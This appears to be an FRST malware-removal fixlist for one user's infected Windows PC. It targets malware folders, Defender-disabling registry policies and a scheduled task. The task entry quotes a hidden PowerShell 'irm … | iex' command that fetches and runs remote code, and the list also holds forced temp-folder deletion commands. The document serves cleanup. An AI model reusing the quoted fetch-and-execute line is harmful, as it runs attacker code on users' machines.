Start
CreateRestorePoint:
CloseProcesses:
Folder: C:\WINDOWS\system32\Tasks\InteractiveServices
Folder: C:\ProgramData\lib_cache_win32
Folder: C:\Users\alyss\AppData\Roaming\lib_cache_win32
Folder: C:\Users\alyss\AppData\Local\Creative
File: C:\Users\alyss\AppData\Local\TurboInd.exe
2026-06-09 21:13 - 2026-06-09 21:13 - 000000000 ____D C:\Users\alyss\AppData\Local\Yandex
2026-06-09 21:12 - 2026-06-09 21:12 - 000000000 ____D C:\WINDOWS\system32\Tasks\InteractiveServices
2026-06-09 21:10 - 2026-06-10 11:11 - 000000000 ____D C:\ProgramData\lib_cache_win32
2026-06-09 21:10 - 2026-06-09 21:10 - 000289248 _____ (Qihu 360 Software Co., Ltd.) C:\Users\alyss\AppData\Local\TurboInd.exe
2026-06-09 21:10 - 2026-06-09 21:10 - 000000000 ____D C:\Users\alyss\AppData\Roaming\lib_cache_win32
C:\Users\alyss\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho
C:\Users\alyss\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\fheoggkfdfchfphceeifdbepaooicaho
C:\Users\alyss\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\fheoggkfdfchfphceeifdbepaooicaho
C:\Users\alyss\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\fheoggkfdfchfphceeifdbepaooicaho
2026-06-09 21:10 - 2022-11-24 21:14 - 000000000 ____D C:\Users\alyss\AppData\Roaming\RenPy
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Restriction <==== ATTENTION
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {7878C4D0-7F7B-4BA3-8370-21D1EB6D0062} - System32\Tasks\InteractiveServices\MicrosoftManagementInfrastructureTask.CL-NCLS-1-5-21-2749689326-3167043893-553478482-1001 => C:\Windows\System32\conhost.exe [1011712 2026-05-12] (Microsoft Windows -> Microsoft Corporation) -> --headless powershell -NoProfile -ExecutionPolicy Bypass -Command "irm 135.11885558/a | iex" <==== ATTENTION
AlternateDataStreams: C:\WINDOWS\tracing:? [16]
AlternateDataStreams: C:\Users\alyss\Desktop\FRST64 (1).exe:MBAM.Zone.Identifier [100]
FirewallRules: [{C84A9D36-8D20-44C9-85E7-3A4D19798DCB}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe => No File
FirewallRules: [{66336BA8-103B-46B2-86FF-FDA5CC6C39A3}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe => No File
FirewallRules: [{852A3D5A-4D10-4644-8C10-4E07A0467D38}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [{440F1702-4710-4924-97EB-59BD324A06E0}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [{75A5D27E-4E06-481A-81C6-AAE346F466EB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Hollow Knight\hollow_knight.exe => No File
FirewallRules: [{9C353B7B-61C5-4D58-B482-28A31D5AED9F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Hollow Knight\hollow_knight.exe => No File
FirewallRules: [{1714D833-FF7C-4582-8944-2E5B469DA19C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Overcooked! 2\Overcooked2.exe => No File
FirewallRules: [{F7334B95-0A2B-43FB-AE6E-20CD397B410B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Overcooked! 2\Overcooked2.exe => No File
FirewallRules: [{f1e3b041-9e17-43c3-bfdb-647bc65d4f9f}] => (Allow) C:\Program Files\ldplayerbox\LdVBoxHeadless.exe => No File
FirewallRules: [{34321038-DB14-4B1F-A5E4-C3A689B99FA9}] => (Allow) C:\Program Files (x86)\BlueStacks X\BlueStacksWeb.exe => No File
FirewallRules: [{D7DA21E4-F185-43C4-80F5-03C5968CEA89}] => (Allow) C:\Program Files (x86)\BlueStacks X\Cloud Game.exe => No File
FirewallRules: [{8cf61b06-300d-40e3-a381-c7bce28692c0}] => (Allow) C:\Program Files\ldplayerbox\LdVBoxHeadless.exe => No File
FirewallRules: [{9E9EF2F3-5ECF-4050-8DCC-46CC2845C7DF}] => (Allow) C:\Program Files (x86)\LetsView\LetsView\LetsView.exe => No File
FirewallRules: [{8D4B1A02-726E-4D3D-A620-CB98DE353971}] => (Allow) C:\Program Files (x86)\LetsView\LetsView\LetsView.exe => No File
FirewallRules: [TCP Query User{E1AA41AD-C4F1-449B-8A30-3415B85EEB0D}C:\program files (x86)\letsview\letsview\wxmcast.exe] => (Block) C:\program files (x86)\letsview\letsview\wxmcast.exe => No File
FirewallRules: [UDP Query User{055FF1BA-F13A-4BA2-9FA4-E066473AB796}C:\program files (x86)\letsview\letsview\wxmcast.exe] => (Block) C:\program files (x86)\letsview\letsview\wxmcast.exe => No File
FirewallRules: [{AD6004E1-2676-4E12-AEA4-9B757D626227}] => (Allow) D:\Tower Of Fantasy\Hotta\Binaries\Win64\INTLWebViewHelper.exe => No File
FirewallRules: [{A12D59A0-100A-44FF-9FC3-18BF891B841F}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.192.647.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{12EE8191-E4C0-4FAD-9C5F-4A4BF4C8B650}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.192.647.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{02BC9159-745E-41DC-9105-B963FD57E4B4}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.192.647.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{635D4768-43BF-47CD-8C32-FF6C1C7E0C5D}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.192.647.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{5E90722B-65CA-4763-BEB6-4070D8B4B151}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.192.647.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{FCCBBEA7-4C16-4B85-B2AD-886E8C9A3136}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.192.647.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{622671E6-9017-4131-8CC7-3E471A91BA21}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.192.647.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{560526D6-7545-4258-80E0-617078F6B336}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.192.647.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [TCP Query User{F65F0B0A-3F38-46C0-B70E-54E3033E79D9}C:\program files\genshin impact\genshin impact game\genshinimpact_data\plugins\zfgamebrowser.exe] => (Block) C:\program files\genshin impact\genshin impact game\genshinimpact_data\plugins\zfgamebrowser.exe => No File
FirewallRules: [UDP Query User{864F1F35-18E4-4396-B7E1-70D0DBFFE019}C:\program files\genshin impact\genshin impact game\genshinimpact_data\plugins\zfgamebrowser.exe] => (Block) C:\program files\genshin impact\genshin impact game\genshinimpact_data\plugins\zfgamebrowser.exe => No File
FirewallRules: [{0096d4ec-cfc9-4055-8330-4acfb185cab1}] => (Allow) C:\Program Files\ldplayerbox\LdVBoxHeadless.exe => No File
FirewallRules: [{38BB7631-DD74-4F14-8F01-04C0794CB425}] => (Allow) D:\Steam\steam.exe => No File
FirewallRules: [{FA61390F-83CC-49C9-BC13-6B8EED0063D7}] => (Allow) D:\Steam\steam.exe => No File
FirewallRules: [{15DCDFD3-3732-4B79-8B65-5D8E4CF568B0}] => (Allow) D:\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [{A5478941-E5A8-4829-B9ED-681BB196D1CE}] => (Allow) D:\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [{995CA7C3-72E5-46BB-BA6E-97E7D432C58A}] => (Allow) C:\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [{7896862C-69CE-4656-9590-2BB7B6DA0530}] => (Allow) C:\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [TCP Query User{EBB8DC2A-16F9-45EE-B3F9-FA253107BC79}C:\program files\e2esoft\ivcam\ivcam.exe] => (Allow) C:\program files\e2esoft\ivcam\ivcam.exe => No File
FirewallRules: [UDP Query User{647841AF-9CD0-49FA-80A2-86C18F331A94}C:\program files\e2esoft\ivcam\ivcam.exe] => (Allow) C:\program files\e2esoft\ivcam\ivcam.exe => No File
FirewallRules: [TCP Query User{61802B31-D4FE-431E-BFAD-35DC0E4E869F}C:\users\alyss\appdata\local\discord\app-1.0.9011\discord.exe] => (Allow) C:\users\alyss\appdata\local\discord\app-1.0.9011\discord.exe => No File
FirewallRules: [UDP Query User{771131C3-6C38-46FE-B60E-FA0CD0AD67B8}C:\users\alyss\appdata\local\discord\app-1.0.9011\discord.exe] => (Allow) C:\users\alyss\appdata\local\discord\app-1.0.9011\discord.exe => No File
FirewallRules: [TCP Query User{BD3A78A7-2A44-4FA2-B153-DAC775C8AEC7}C:\program files\star rail\games\starrail.exe] => (Allow) C:\program files\star rail\games\starrail.exe => No File
FirewallRules: [UDP Query User{3EB0A6B6-06FD-42CA-BAFB-F18A4F2D48D2}C:\program files\star rail\games\starrail.exe] => (Allow) C:\program files\star rail\games\starrail.exe => No File
FirewallRules: [TCP Query User{F7675192-924B-4129-B23F-5E2757555085}E:\steamlibrary\steamapps\common\palworld\pal\binaries\win64\palworld-win64-shipping.exe] => (Allow) E:\steamlibrary\steamapps\common\palworld\pal\binaries\win64\palworld-win64-shipping.exe => No File
FirewallRules: [UDP Query User{369DA6EC-2A72-480E-9681-DB468D904764}E:\steamlibrary\steamapps\common\palworld\pal\binaries\win64\palworld-win64-shipping.exe] => (Allow) E:\steamlibrary\steamapps\common\palworld\pal\binaries\win64\palworld-win64-shipping.exe => No File
FirewallRules: [{9BFAA1EA-23D9-48CB-9046-A884438A5581}] => (Allow) E:\SteamLibrary\steamapps\common\P3R\P3R\Binaries\Win64\P3R.exe => No File
FirewallRules: [{2FC3CCE6-DF41-4866-B5C4-D3184AAE201D}] => (Allow) E:\SteamLibrary\steamapps\common\P3R\P3R\Binaries\Win64\P3R.exe => No File
FirewallRules: [TCP Query User{82BFB230-C64C-45CA-8C2E-6B6835F82E4D}E:\wuthering waves\wuthering waves game\client\binaries\win64\client-win64-shipping.exe] => (Allow) E:\wuthering waves\wuthering waves game\client\binaries\win64\client-win64-shipping.exe => No File
FirewallRules: [UDP Query User{BA63D384-A9B9-4680-83FF-546E3B41601A}E:\wuthering waves\wuthering waves game\client\binaries\win64\client-win64-shipping.exe] => (Allow) E:\wuthering waves\wuthering waves game\client\binaries\win64\client-win64-shipping.exe => No File
FirewallRules: [{9F304FB2-5A8E-4ABD-8FF9-F47067B5F0B1}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\ElementsPanelDaemon.exe => No File
FirewallRules: [TCP Query User{34C8182A-119B-4CFB-BBF9-9A2E4005CEC9}C:\users\alyss\appdata\local\discord\app-1.0.9158\discord.exe] => (Allow) C:\users\alyss\appdata\local\discord\app-1.0.9158\discord.exe => No File
FirewallRules: [UDP Query User{56B809F8-E8D8-46D2-8E53-950291411BC7}C:\users\alyss\appdata\local\discord\app-1.0.9158\discord.exe] => (Allow) C:\users\alyss\appdata\local\discord\app-1.0.9158\discord.exe => No File
FirewallRules: [TCP Query User{D9EF210F-CA11-40C9-9D22-50E20D754558}C:\users\alyss\scoop\apps\youtube-music\3.6.2\youtube music.exe] => (Allow) C:\users\alyss\scoop\apps\youtube-music\3.6.2\youtube music.exe => No File
FirewallRules: [UDP Query User{15CD19EF-8B26-40D1-9171-EA427599CA97}C:\users\alyss\scoop\apps\youtube-music\3.6.2\youtube music.exe] => (Allow) C:\users\alyss\scoop\apps\youtube-music\3.6.2\youtube music.exe => No File
FirewallRules: [TCP Query User{235D3A20-3B21-4E36-A222-857F5B1C937B}C:\users\alyss\downloads\return-of-the-obra-dinn-steamrip.com\return of the obra dinn\obradinn.exe] => (Block) C:\users\alyss\downloads\return-of-the-obra-dinn-steamrip.com\return of the obra dinn\obradinn.exe => No File
FirewallRules: [UDP Query User{A597CD69-7669-470F-A7F6-E3C7E38DBC23}C:\users\alyss\downloads\return-of-the-obra-dinn-steamrip.com\return of the obra dinn\obradinn.exe] => (Block) C:\users\alyss\downloads\return-of-the-obra-dinn-steamrip.com\return of the obra dinn\obradinn.exe => No File
FirewallRules: [{A3DFF5D5-06A5-4037-BB16-3A8B15F55D0E}] => (Allow) E:\SteamLibrary\steamapps\common\Infinity Nikki\1.2.5\xstarter.exe => No File
FirewallRules: [TCP Query User{37DB641D-CA4D-4F1C-AB62-4A4F6DFA877E}C:\users\alyss\appdata\local\discord\app-1.0.9234\discord.exe] => (Allow) C:\users\alyss\appdata\local\discord\app-1.0.9234\discord.exe => No File
FirewallRules: [UDP Query User{6A622508-68C4-4EBF-A726-B0199ED27830}C:\users\alyss\appdata\local\discord\app-1.0.9234\discord.exe] => (Allow) C:\users\alyss\appdata\local\discord\app-1.0.9234\discord.exe => No File
FirewallRules: [TCP Query User{B2A5B491-37D4-4226-ADE4-0900851070BD}E:\pico-park-2-steamrip.com\pico park 2\pico_park_2.exe] => (Allow) E:\pico-park-2-steamrip.com\pico park 2\pico_park_2.exe => No File
FirewallRules: [UDP Query User{A15B6811-48EF-4393-8670-D08C8376BC71}E:\pico-park-2-steamrip.com\pico park 2\pico_park_2.exe] => (Allow) E:\pico-park-2-steamrip.com\pico park 2\pico_park_2.exe => No File
FirewallRules: [TCP Query User{17E6B20F-BB0E-40D0-BB0F-8BC09EC69989}C:\program files\windowsapps\chengduboostvisiontechnol.aircast-mirroringtowindo_1.3.4.0_x64__8qkn9d99kwztm\airplay_receiver.exe] => (Allow) C:\program files\windowsapps\chengduboostvisiontechnol.aircast-mirroringtowindo_1.3.4.0_x64__8qkn9d99kwztm\airplay_receiver.exe => No File
FirewallRules: [UDP Query User{1B63DFEB-9C3A-4D16-A498-0A318826827D}C:\program files\windowsapps\chengduboostvisiontechnol.aircast-mirroringtowindo_1.3.4.0_x64__8qkn9d99kwztm\airplay_receiver.exe] => (Allow) C:\program files\windowsapps\chengduboostvisiontechnol.aircast-mirroringtowindo_1.3.4.0_x64__8qkn9d99kwztm\airplay_receiver.exe => No File
FirewallRules: [TCP Query User{E592076C-FFF8-4FF4-831E-325B568D5F9F}C:\users\alyss\appdata\local\discord\app-1.0.9235\discord.exe] => (Allow) C:\users\alyss\appdata\local\discord\app-1.0.9235\discord.exe => No File
FirewallRules: [UDP Query User{CF6B9409-F28E-4BBE-B0CF-DAB567B969C9}C:\users\alyss\appdata\local\discord\app-1.0.9235\discord.exe] => (Allow) C:\users\alyss\appdata\local\discord\app-1.0.9235\discord.exe => No File
FirewallRules: [TCP Query User{F4C0CA5A-B4F9-49E6-AB15-E7F9C8FAA45A}E:\chained together\chained together\chainedtogether\binaries\win64\chainedtogether-win64-shipping.exe] => (Allow) E:\chained together\chained together\chainedtogether\binaries\win64\chainedtogether-win64-shipping.exe => No File
FirewallRules: [UDP Query User{BACAD5BE-2B3E-446E-938A-77C7E18192FC}E:\chained together\chained together\chainedtogether\binaries\win64\chainedtogether-win64-shipping.exe] => (Allow) E:\chained together\chained together\chainedtogether\binaries\win64\chainedtogether-win64-shipping.exe => No File
FirewallRules: [TCP Query User{676A7E9C-640F-467A-A869-21412A49C740}C:\users\alyss\appdata\local\discord\app-1.0.9239\discord.exe] => (Allow) C:\users\alyss\appdata\local\discord\app-1.0.9239\discord.exe => No File
FirewallRules: [UDP Query User{3599D18E-5C5D-4957-BC29-BB22E6672BEB}C:\users\alyss\appdata\local\discord\app-1.0.9239\discord.exe] => (Allow) C:\users\alyss\appdata\local\discord\app-1.0.9239\discord.exe => No File
FirewallRules: [{AA22947F-85D6-411E-92A1-6645FDF24C54}] => (Allow) C:\Program Files\Razer\RazerAppEngine\app-4.0.679\RazerAppEngine.exe => No File
HKLM-x32\...\Run: [Genshin Impact_launcher_mihoyo_1_0] => C:\Program Files\Genshin Impact\updateProgram\Update.exe (No File)
Task: {AAD913CF-AD65-4C18-897A-52B07D2155C5} - System32\Tasks\DiscordAdmin => C:\Users\alyss\AppData\Local\Discord\app-1.0.9232\Discord.exe  (No File) <==== ATTENTION
Task: {1CDD718D-1381-4E5F-9CF9-CAF68B0AEFF2} - System32\Tasks\Meta\Messenger-WSP-Helper-S-1-5-21-2749689326-3167043893-553478482-1001 => MessengerHelper.exe  --lassie (No File)
Task: {077BA067-7C15-40F0-B22E-C9DC2A54B4A2} - System32\Tasks\Microsoft\Windows\Location\Notifications => %windir%\System32\LocationNotificationWindows.exe  (No File)
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => %SystemRoot%\System32\MbaeParserTask.exe  (No File)
Task: {194E3D8F-5BA1-4638-B4BB-8697D83D04EB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\MusUx_LogonUpdateResults => %systemroot%\system32\MusNotification.exe  LogonUpdateResults (No File)
Task: {72027B9D-5152-4A7D-968A-2C2BBE5DE54D} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\MusUx_UpdateInterval => %systemroot%\system32\MusNotification.exe  Display (No File)
Task: {92797B68-F767-455E-B95F-94E665B066BE} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_AC => %systemroot%\system32\MusNotification.exe  /RunOnAC ReadyToReboot (No File)
Task: {3F5D3C69-24DE-4C7E-B5BB-B155380975A3} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery => %systemroot%\system32\MusNotification.exe  /RunOnBattery ReadyToReboot (No File)
Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe  (No File)
File: C:\Users\alyss\AppData\Local\Temp\tmp-97107-TDSDUXf20e40\SsUCommon.dll;D:\Sideloadly\sideloadlydaemon.exe;C:\Users\alyss\AppData\Roaming\0install.net\desktop-integration\stubs\1eae01f3cdb5ff0ecf683b15a60a1489573c1188cb34abc205fcf7a924b4e54d\auto-start.exe
C:\Users\alyss\AppData\Local\Temp\tmp-97107-TDSDUXf20e40
CMD: Dir /b c:\*SsUCommon.dll* /s
2026-06-10 11:53 - 2026-06-10 11:53 - 002641920 _____ (Farbar) C:\Users\alyss\Downloads\Unconfirmed 251471.crdownload

Powershell: Get-ScheduledTask | select -first 30 | Get-ScheduledTaskInfo
Powershell: @("$env:APPDATA","$env:LOCALAPPDATA") | ForEach-Object { Get-ChildItem $_ -Recurse -Filter "index.js" -ErrorAction SilentlyContinue } | Where-Object { $_.FullName -match "discord_desktop_core" } | ForEach-Object { Write-Host "--- $($_.FullName) ---"; (Get-Content $_.FullName -Raw).Substring(0,[Math]::Min(2000,(Get-Content $_.FullName -Raw).Length)) }
Powershell: (Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -ErrorAction SilentlyContinue).PSObject.Properties | Where-Object { $_.Name -match "^[a-z]$" } | ForEach-Object { Write-Host "$($_.Name): $($_.Value)" }

C:\WINDOWS\Temp\*
C:\WINDOWS\SystemTemp\*
C:\Users\alyss\AppData\Local\Temp\*

StartPowerShell:
# Downloads newest AdwCleaner version directly from Malwarebytes, performs an update, scans, cleans and writes the log in console
# Does not clean preinstalled objects, only PUP/Adware
# If you would like to delete preinstalled objects, add an argument /preinstalled to the /clean argument
# If you would like to only scan with it, change the argument from /clean to /scan

New-Item -ItemType Directory -Force -Path "$env:SystemDrive\AdwCleaner" | Out-Null
Invoke-WebRequest -Uri "https://adwcleaner.malwarebytes.com/adwcleaner?channel=release" -OutFile "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/eula" -Wait -WindowStyle Hidden
$logFile = "$env:SystemDrive\AdwCleaner\AdwCleanerOutputFRST.txt"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/noreboot /clean" -Wait -WindowStyle Hidden -RedirectStandardOutput $logFile
Get-Content $logFile -Encoding Unicode
Remove-Item -Path $logFile -Force -ErrorAction SilentlyContinue
EndPowerShell:

StartPowershell:
# Replace /scanonly with /clean if you also want to delete items -- however, this will activate a trial license on the system, I do not recommend it
$hmpExe  = "$env:TEMP\HitmanPro_x64.exe"
$logFile = "$env:TEMP\HitmanPro_ScanLog.txt"
Invoke-WebRequest -Uri "https://dl.surfright.nl/HitmanPro_x64.exe" -OutFile $hmpExe -UseBasicParsing
$proc = Start-Process $hmpExe -ArgumentList "/ews","/scanonly","/noinstall","/log=`"$logFile`"","/logtype=txt" -Wait -PassThru
if (!(Test-Path $logFile)) { Write-Host "Scan failed (exit $($proc.ExitCode))"; exit 1 }
Get-Content $logFile -Encoding Unicode
EndPowershell:

StartPowerShell:
# This snippet downloads Emsisoft Emergency Kit (EEK) from the Emsisoft's official site, updates it, scans with it.
# Do note that the executable is 300MB and may take some time to download.
# ---
# This will scan for malware and PUP's in 1) system memory 2) important folders as documentation says
# It will scan in compressed archives, in mail archives, in NTFS alternate data streams and use cloud requests
# ---
# You can use argument "/delete" to delete found objects including references but this is permanent and irreversible.
# You can remove the "/quick" argument to do a full scan but that may take longer than what FRST can handle.
# You can use argument "/quarantine="[folder]"" to put found malware into quarantine, but I personally prefer first verifying the detections.
$downloadUrl = "https://dl.emsisoft.com/EmsisoftEmergencyKit.exe"
$systemDrive = $env:SystemDrive
$frstPath = "$systemDrive\FRST"
$savePath = "$frstPath\EEK.exe"
$extractPath = "$frstPath\EEK"
if (-not (Test-Path $frstPath)) {
    New-Item -Path $frstPath -ItemType Directory -Force | Out-Null
}
if (-not (Test-Path $extractPath)) {
    New-Item -Path $extractPath -ItemType Directory -Force | Out-Null
}
Invoke-WebRequest -Uri $downloadUrl -OutFile $savePath -UseBasicParsing
$proc = Start-Process -FilePath $savePath -ArgumentList "-s -d`"$extractPath`"" -PassThru
while (-not (Test-Path "$extractPath\bin64\a2cmd.exe")) { Start-Sleep -Milliseconds 1000 }
Stop-Process -Id $proc.Id -Force -ErrorAction SilentlyContinue
if ([Environment]::Is64BitOperatingSystem) {
    $a2cmdPath = Join-Path $extractPath "bin64\a2cmd.exe"
} else {
    $a2cmdPath = Join-Path $extractPath "bin32\a2cmd.exe"
}
Start-Process -FilePath $a2cmdPath -ArgumentList "/update" -Wait -NoNewWindow
Start-Process -FilePath $a2cmdPath -ArgumentList "/malware /quick /m /t /pup /a /am /cloud=1 /la=`"$frstPath\EEK_scan.log`"" -Wait -NoNewWindow
Get-Content "$frstPath\EEK_scan.log"
exit
EndPowerShell:

cmd: del %temp%\*.* /f /s /q
cmd: rd /s /q %temp%
cmd: bitsadmin /reset /allusers
cmd: netsh winsock reset catalog
cmd: ipconfig /flushdns
RemoveProxy:
EmptyTemp:
End